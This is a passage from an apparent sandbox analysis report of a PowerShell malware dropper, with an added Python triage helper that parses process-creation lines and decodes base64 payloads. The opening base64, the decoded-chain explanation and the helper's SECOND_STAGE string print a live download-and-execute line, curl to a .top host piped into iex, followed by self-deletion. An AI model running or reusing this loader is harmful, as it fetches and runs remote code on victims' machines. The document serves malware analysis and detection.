5LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gJHFrcWpIdmJ5QUMwc2ZnZXlKdzAwdHNZTEhJTFpab093Y1pKS3VFb1l4ZllrS3lrUmFuaTVqWmdLa1lPbks3QmFZSXIxRWF4NXdQSHVYTm85RWdCYmRZVGlNamNNR0YgKyAxOwogICAgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ID0gJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ICsgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25
oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgKyAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDVBZGQ7Cn07CiRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRn07CiRxNHNrM0Z2eDE4eVRVNzZBbVhKeGtGelBtUWlTTSA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMTIgfCAlIHtbY2hhcl0kX30pKTsKJGJpRFdYRDJWYkhQID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJHE0c2szRnZ4MTh5VFU3NkFtWEp4a0Z6UG1RaVNNKS5wczEiIC1Gb3JjZSAKIkA7CgoicG93ZXJzaGVsbCAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dTdHlsZSB
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
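The process-creation evidence above is the whole delivery chain in six command lines: wscript.exe spawns powershell.exe with -executionpolicy bypass and a hidden window, which runs cmd /q /c on a .bat staged in AppData\Roaming; cmd runs a .ps1 of the same random name; that script spawns PowerShell again with an inline [System.Convert]::FromBase64String payload; and the decoded payload finally runs a .ps1 dropped in C:\Users\Public\Documents. Decoding the base64 the report prints (it is UTF-8, not the UTF-16LE that -EncodedCommand uses) shows a script that reads the current hour and minute, adds three minutes with hour and day roll-over, picks a random 12-letter name, and builds a second stage that runs `curl -useb "http://rigzuvzi3bnz3.top/1.php?s=mints13" | iex` (curl being Windows PowerShell's alias for Invoke-WebRequest) and then deletes its own .ps1 from C:\Users\Public\Documents with Remove-Item -Force; the report's copy of the string is cut off after "-WindowStyle ", so whatever schedules that run is not visible on this page.

The triage helper below is an added example, not part of the Joe Sandbox report or of the malware. It parses "Process created" lines in the report's own layout, flags the traits the Sigma hits above key on (script host spawning PowerShell, execution-policy bypass, hidden window, scripts in AppData\Roaming and C:\Users\Public), and decodes the inline base64 even when the copied string is truncated, by dropping the dangling partial 4-character group so the intact prefix still decodes. The four sample lines are constructed from the report's; SECOND_STAGE is a paraphrase of the decoded payload with its random variable names shortened, and the encoded sample is deliberately cut at 400 characters to reproduce the page's truncation.

```python
"""Triage "Process created" lines copied out of a sandbox report (added example,
not part of the Joe Sandbox report or of the malware): rebuild parent/child
pairs, flag the traits the report's Sigma hits key on, and decode the
FromBase64String payload even when the copied base64 is cut off, as here."""
import base64
import re

# Constructed: the decoded second stage, paraphrased from the report's payload
# (random names shortened; the report's copy ends after "-WindowStyle ", as here).
SECOND_STAGE = (
    '$ErrorActionPreference = "Continue"\n'
    '$name = $(-join ((65..90) + (97..122) | Get-Random -Count 12 | % {[char]$_}));\n'
    '$body = @"\n'
    '$ErrorActionPreference = "Continue"\n'
    'curl -useb "http://rigzuvzi3bnz3.top/1.php?s=mints13" | iex;\n'
    'Remove-Item "C:\\Users\\Public\\Documents\\$($name).ps1" -Force\n'
    '"@;\n'
    '"powershell -noprofile -executionpolicy bypass -WindowStyle '
)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

def encoded_cmdline(script, keep=0):
    """Wrap a script as the report shows it ([Text.Encoding]::UTF8, unlike the
    UTF-16LE of -EncodedCommand); keep=N cuts the base64 to N characters to
    mimic a truncated report line, so no closing quote survives."""
    b64 = base64.b64encode(script.encode("utf-8")).decode("ascii")
    head = ("powershell.exe -executionpolicy bypass -WindowStyle hidden -c "
            "\"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('")
    return head + b64[:keep] if keep else head + b64 + "'))\""

def encode_utf16_command(script):
    """What `powershell -EncodedCommand` expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r'''https?://[^\s"'<>)]+''')
PROC_RE = re.compile(r"Source:\s*(.+?)\s*Process created:\s*(\S+)\s*(.*)")

def extract_b64(cmdline):
    m = B64_RE.search(cmdline)
    return m.group(1) if m else None

def decode_lenient(b64):
    """Decode base64 that may be cut off mid-stream: drop the dangling partial
    4-character group so the intact prefix still decodes, then pick UTF-16LE
    (NUL bytes present, -EncodedCommand style) or UTF-8."""
    b64 = re.sub(r"[^A-Za-z0-9+/=]", "", b64)
    raw = base64.b64decode(b64[: len(b64) - len(b64) % 4])
    codec = "utf-16-le" if b"\x00" in raw[:64] else "utf-8"
    return raw.decode(codec, errors="replace")

def script_iocs(script):
    """Network and behaviour indicators from a decoded PowerShell stage."""
    out = ["url:" + u for u in URL_RE.findall(script)]
    if re.search(r"\|\s*(?:iex|Invoke-Expression)\b", script, re.I):
        out.append("download-and-execute (| iex)")
    if re.search(r"\bRemove-Item\b.*\.ps1", script, re.I):
        out.append("self-delete (Remove-Item *.ps1)")
    return out

def _base(path):
    return path.strip('"').rsplit("\\", 1)[-1].lower()

def triage_line(line):
    """Return (parent, child, findings) for one 'Process created' line."""
    m = PROC_RE.match(line.strip())
    if not m:
        return None
    parent, child, cmd = _base(m.group(1)), _base(m.group(2)), m.group(3)
    findings = []
    if parent == "wscript.exe" and child == "powershell.exe":
        findings.append("script host spawned PowerShell")
    if re.search(r"-executionpolicy\s+bypass", cmd, re.I):
        findings.append("execution policy bypass")
    if re.search(r"-windowstyle\s+hidden", cmd, re.I):
        findings.append("hidden window")
    if re.search(r"\\Users\\Public\\", cmd, re.I):
        findings.append("script run from C:\\Users\\Public")
    if re.search(r'\\AppData\\Roaming\\[^\\\s"]+\.(?:bat|ps1)', cmd, re.I):
        findings.append("staged script in AppData\\Roaming")
    b64 = extract_b64(cmd)
    if b64:
        findings.append("inline base64 payload")
        findings.extend(script_iocs(decode_lenient(b64)))
    return parent, child, findings

def triage(lines):
    return [r for r in (triage_line(ln) for ln in lines) if r]

# Constructed from the report's four distinct lines; base64 line cut at 400 chars.
PROCESS_LINES = [
    r"Source: C:\Windows\System32\wscript.exe Process created: " + PS
    + r' powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"',
    r"Source: C:\Windows\System32\cmd.exe Process created: " + PS
    + r' powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"',
    "Source: " + PS + " Process created: " + PS + " " + encoded_cmdline(SECOND_STAGE, keep=400),
    "Source: " + PS + " Process created: " + PS + ' "' + PS
    + r'" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1',
]
```

Calling `triage(PROCESS_LINES)` yields one (parent, child, findings) tuple per line; the third tuple carries the decoded indicators, including url:http://rigzuvzi3bnz3.top/1.php?s=mints13, even though its base64 was cut short. The lenient decoder is the part worth keeping: a report that truncates a long command line leaves a string whose length is not a multiple of four, and base64.b64decode raises on it unless the partial group is dropped first; the NUL-byte check is what separates an inline [Text.Encoding]::UTF8 payload like this one from an -EncodedCommand payload.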

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical entries)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical entries)
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook\ConfigContextData 1
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX (71 identical entries)
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (2 identical entries)
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX (2 identical entries)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX (73 identical entries)
              Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX (16 identical entries)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
